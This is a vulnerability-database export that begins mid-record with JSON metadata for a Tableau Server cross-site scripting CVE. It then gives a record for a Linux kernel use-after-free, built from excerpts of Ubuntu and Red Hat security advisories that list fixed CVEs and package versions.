        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.2.6"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.2.4"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.4"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.2.3"
      },
      {
        "model": "server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "tableau",
        "version": "2019.3.2"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:tableau:tableau_server:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2019.4",
                    "versionStartIncluding": "10.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      }
    ]
  },
  "cve": "CVE-2019-19719",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19719",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2020-04286",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2019-19719",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19719",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-04286",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201912-480",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-19719",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Tableau Server 10.3 through 2019.4 on Windows and Linux allows XSS via the embeddedAuthRedirect page. Tableau Server Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. This product is mainly used to manage and share data visualizations, interactive dashboards, workbooks and reports created by Tableau Desktop data visualization software. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19719",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "id": "VAR-201912-1402",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:18:29.101000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "[Important] ADV-2019-047: Open redirect on embeddedAuthRedirect page",
        "trust": 0.8,
        "url": "https://community.tableau.com/community/security-bulletins/blog/2019/11/19/important-adv-2019-047-open-redirect-on-embeddedauthredirect-page"
      },
      {
        "title": "Patch for Tableau Server Cross-Site Scripting Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/199519"
      },
      {
        "title": "Tableau Software Server Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104538"
      },
      {
        "title": "jaeles",
        "trust": 0.1,
        "url": "https://github.com/jaeles-project/jaeles "
      },
      {
        "title": "jaeles-signatures",
        "trust": 0.1,
        "url": "https://github.com/jaeles-project/jaeles-signatures "
      },
      {
        "title": "kenzer-templates",
        "trust": 0.1,
        "url": "https://github.com/elsfa7-110/kenzer-templates "
      },
      {
        "title": "kenzer-templates",
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19719"
      },
      {
        "trust": 1.7,
        "url": "https://community.tableau.com/community/security-bulletins/blog/2019/11/19/important-adv-2019-047-open-redirect-on-embeddedauthredirect-page"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19719"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/79.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jaeles-project/jaeles"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-12-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "date": "2019-12-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "date": "2019-12-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "date": "2019-12-11T04:15:10.573000",
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "date": "2019-12-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-02-07T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-04286"
      },
      {
        "date": "2019-12-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19719"
      },
      {
        "date": "2019-12-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      },
      {
        "date": "2019-12-12T20:07:55.097000",
        "db": "NVD",
        "id": "CVE-2019-19719"
      },
      {
        "date": "2019-12-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Tableau Server Vulnerable to cross-site scripting",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012906"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-480"
      }
    ],
    "trust": 0.6
  }
}

var-202002-1243
Vulnerability from variot

There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/n_tty.c. ========================================================================== Ubuntu Security Notice USN-4345-1 April 28, 2020

linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities ==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 18.04 LTS
  • Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2020-11884)

It was discovered that the Intel Wi-Fi driver in the Linux kernel did not properly check for errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-16234)

Tristan Madani discovered that the block I/O tracing implementation in the Linux kernel contained a race condition. A local attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2019-19768)

It was discovered that the vhost net driver in the Linux kernel contained a stack buffer overflow. A local attacker with the ability to perform ioctl() calls on /dev/vhost-net could use this to cause a denial of service (system crash). (CVE-2020-10942)

It was discovered that the OV51x USB Camera device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2020-11608)

It was discovered that the STV06XX USB Camera device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2020-11609)

It was discovered that the Xirlink C-It USB Camera device driver in the Linux kernel did not properly validate device metadata. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2020-11668)

It was discovered that the virtual terminal implementation in the Linux kernel contained a race condition. A local attacker could possibly use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2020-8648)

Jordy Zomer discovered that the floppy driver in the Linux kernel did not properly check for errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2020-9383)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 18.04 LTS: linux-image-4.15.0-1038-oracle 4.15.0-1038.42 linux-image-4.15.0-1058-gke 4.15.0-1058.61 linux-image-4.15.0-1059-kvm 4.15.0-1059.60 linux-image-4.15.0-1061-raspi2 4.15.0-1061.65 linux-image-4.15.0-1066-aws 4.15.0-1066.70 linux-image-4.15.0-1077-snapdragon 4.15.0-1077.84 linux-image-4.15.0-1080-oem 4.15.0-1080.90 linux-image-4.15.0-99-generic 4.15.0-99.100 linux-image-4.15.0-99-generic-lpae 4.15.0-99.100 linux-image-4.15.0-99-lowlatency 4.15.0-99.100 linux-image-aws-lts-18.04 4.15.0.1066.69 linux-image-generic 4.15.0.99.89 linux-image-generic-lpae 4.15.0.99.89 linux-image-gke 4.15.0.1058.62 linux-image-gke-4.15 4.15.0.1058.62 linux-image-kvm 4.15.0.1059.59 linux-image-lowlatency 4.15.0.99.89 linux-image-oem 4.15.0.1080.84 linux-image-oracle-lts-18.04 4.15.0.1038.47 linux-image-powerpc-e500mc 4.15.0.99.89 linux-image-powerpc-smp 4.15.0.99.89 linux-image-powerpc64-emb 4.15.0.99.89 linux-image-powerpc64-smp 4.15.0.99.89 linux-image-raspi2 4.15.0.1061.59 linux-image-snapdragon 4.15.0.1077.80 linux-image-virtual 4.15.0.99.89

Ubuntu 16.04 LTS: linux-image-4.15.0-1038-oracle 4.15.0-1038.42~16.04.1 linux-image-4.15.0-1061-gcp 4.15.0-1061.65 linux-image-4.15.0-1066-aws 4.15.0-1066.70~16.04.1 linux-image-4.15.0-1082-azure 4.15.0-1082.92~16.04.1 linux-image-4.15.0-99-generic 4.15.0-99.100~16.04.1 linux-image-4.15.0-99-generic-lpae 4.15.0-99.100~16.04.1 linux-image-4.15.0-99-lowlatency 4.15.0-99.100~16.04.1 linux-image-aws-hwe 4.15.0.1066.66 linux-image-azure 4.15.0.1082.81 linux-image-azure-edge 4.15.0.1082.81 linux-image-gcp 4.15.0.1061.75 linux-image-generic-hwe-16.04 4.15.0.99.106 linux-image-generic-lpae-hwe-16.04 4.15.0.99.106 linux-image-gke 4.15.0.1061.75 linux-image-lowlatency-hwe-16.04 4.15.0.99.106 linux-image-oem 4.15.0.99.106 linux-image-oracle 4.15.0.1038.31 linux-image-virtual-hwe-16.04 4.15.0.99.106

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Bugs fixed (https://bugzilla.redhat.com/):

1733495 - BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:974 1759052 - CVE-2019-15925 kernel: out-of-bounds access in function hclge_tm_schd_mode_vnet_base_cfg 1760100 - CVE-2019-15917 kernel: use-after-free in drivers/bluetooth/hci_ldisc.c 1760310 - CVE-2019-16231 kernel: null-pointer dereference in drivers/net/fjes/fjes_main.c 1760420 - CVE-2019-16233 kernel: null pointer dereference in drivers/scsi/qla2xxx/qla_os.c 1774946 - CVE-2019-19072 kernel: A memory leak in the predicate_parse() function in kernel/trace/trace_events_filter.c allows for a DoS 1774963 - CVE-2019-19068 kernel: A memory leak in the rtl8xxxu_submit_int_urb() function in drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c allows for a DoS 1774988 - CVE-2019-19046 kernel: Denial Of Service in the __ipmi_bmc_register() function in drivers/char/ipmi/ipmi_msghandler.c 1775015 - CVE-2019-19063 kernel: Two memory leaks in the rtl_usb_probe() function in drivers/net/wireless/realtek/rtlwifi/usb.c allow for a DoS 1775021 - CVE-2019-19062 kernel: memory leak in the crypto_report() function in crypto/crypto_user_base.c allows for DoS 1775097 - CVE-2019-19056 kernel: A memory leak in the mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows to cause DoS 1777418 - CVE-2019-18808 kernel: memory leak in ccp_run_sha_cmd() function in drivers/crypto/ccp/ccp-ops.c 1777449 - CVE-2019-18809 kernel: memory leak in af9005_identify_state() function in drivers/media/usb/dvb-usb/af9005.c 1779046 - RT host hang with Call Trace "WARNING: CPU: 16 PID: 153 at kernel/smp.c:333 smp_call_function_single_async+0x7a/" 1779594 - CVE-2019-19332 Kernel: kvm: OOB memory write via kvm_dev_ioctl_get_cpuid 1781679 - CVE-2019-19447 kernel: mounting a crafted ext4 filesystem image, performing some operations, and unmounting can lead to a use-after-free in ext4_put_super in fs/ext4/super.c 1781810 - CVE-2019-19543 kernel: use-after-free in serial_ir_init_module() in drivers/media/rc/serial_ir.c 1783459 - CVE-2019-19524 kernel: a malicious USB device in the drivers/input/ff-memless.c leads to use-after-free 1783534 - CVE-2019-19533 kernel: information leak bug caused by a malicious USB device in the drivers/media/usb/ttusb-dec/ttusb_dec.c 1783561 - CVE-2019-19537 kernel: race condition caused by a malicious USB device in the USB character device driver layer 1784130 - CVE-2019-19319 kernel: out-of-bounds write in ext4_xattr_set_entry in fs/ext4/xattr.c 1786160 - CVE-2019-19767 kernel: use-after-free in __ext4_expand_extra_isize and ext4_xattr_set_entry related to fs/ext4/inode.c and fs/ext4/super.c 1786179 - CVE-2019-19770 kernel: use-after-free in debugfs_remove in fs/debugfs/inode.c 1790063 - CVE-2019-20054 kernel: Null pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c 1802555 - CVE-2020-8649 kernel: invalid read location in vgacon_invert_region function in drivers/video/console/vgacon.c 1802559 - CVE-2020-8648 kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c 1802563 - CVE-2020-8647 kernel: out-of-bounds read in in vc_do_resize function in drivers/tty/vt/vt.c 1817718 - CVE-2020-10942 kernel: vhost-net: stack overflow in get_raw_socket while checking sk_family field 1819377 - CVE-2019-9458 kernel: use after free due to race condition in the video driver leads to local privilege escalation 1819399 - CVE-2019-9455 kernel: kernel pointer leak due to WARN_ON statement in video driver leads to local information disclosure 1822077 - CVE-2020-12826 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process 1824059 - CVE-2019-20636 kernel: out-of-bounds write via crafted keycode table 1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c 1824918 - CVE-2020-11565 kernel: out-of-bounds write in mpol_parse_str function in mm/mempolicy.c 1831399 - CVE-2020-10732 kernel: uninitialized kernel data leak in userspace coredumps 1832543 - CVE-2020-12655 kernel: sync of excessive duration via an XFS v5 image with crafted metadata 1832876 - CVE-2020-12659 kernel: xdp_umem_reg in net/xdp/xdp_umem.c has an out-of-bounds write which could result in crash and data coruption 1833196 - adaptive-tick appears to not be functioning as expected on RHEL 8.2 RT 1834845 - CVE-2020-12770 kernel: sg_write function lacks an sg_remove_request call in a certain failure case 1839634 - CVE-2020-10751 kernel: SELinux netlink permission check bypass 1843410 - RT guest get Call Trace "INFO: task ld:274531 blocked for more than 600 seconds." 1846964 - CVE-2020-10774 kernel: possibility of memory disclosure when reading the file /proc/sys/kernel/rh_features 1852298 - Install VM fails and RT host get Call Trace "WARNING: CPU: 18 PID: 2947 at fs/eventfd.c:68 eventfd_signal+0x7e/0x90" 1859590 - [efi]RT kernel crash with "rcu: INFO: rcu_preempt detected stalls on CPUs/tasks" 1860065 - CVE-2020-0305 kernel: possible use-after-free due to a race condition in cdev_get of char_dev.c 1874311 - CVE-2020-14381 kernel: referencing inode of removed superblock in get_futex_key() causes UAF 1881424 - CVE-2020-25641 kernel: soft-lockups in iov_iter_copy_from_user_atomic() could result in DoS

  1. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.2/html/release_notes/

Security fixes:

  • redisgraph-tls: redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)

  • console-header-container: nodejs-netmask: improper input validation of octal input data (CVE-2021-28092)

  • console-container: nodejs-is-svg: ReDoS via malicious string (CVE-2021-28918)

Bug fixes:

  • RHACM 2.2.4 images (BZ# 1957254)

  • Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 (BZ#1950832)

  • ACM Operator should support using the default route TLS (BZ# 1955270)

  • The scrolling bar for search filter does not work properly (BZ# 1956852)

  • Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)

  • The proxy setup in install-config.yaml is not worked when IPI installing with RHACM (BZ# 1960181)

  • Unable to make SSH connection to a Bitbucket server (BZ# 1966513)

  • Observability Thanos store shard crashing - cannot unmarshall DNS message (BZ# 1967890)

  • Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory 1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters 1954535 - Reinstall Submariner - No endpoints found on one cluster 1955270 - ACM Operator should support using the default route TLS 1956852 - The scrolling bar for search filter does not work properly 1957254 - RHACM 2.2.4 images 1959426 - Limits on Length of MultiClusterObservability Resource Name 1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. 1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service" 1966513 - Unable to make SSH connection to a Bitbucket server 1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. 1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Security Fix(es):

  • kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)

  • kernel: Use after free via PI futex state (CVE-2021-3347)

  • kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c (CVE-2020-8648)

  • kernel: Improper input validation in some Intel(R) Graphics Drivers (CVE-2020-12363)

  • kernel: Null pointer dereference in some Intel(R) Graphics Drivers (CVE-2020-12364)

  • kernel: Speculation on pointer arithmetic against bpf_context pointer (CVE-2020-27170)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • kernel crash when call the timer function (sctp_generate_proto_unreach_event) of sctp module (BZ#1707184)

  • SCSI error handling process on HP P440ar controller gets stuck indefinitely in device reset operation (BZ#1830268)

  • netfilter: reproducible deadlock on nft_log module autoload (BZ#1858329)

  • netfilter: NULL pointer dereference in nf_tables_set_lookup() (BZ#1873171)

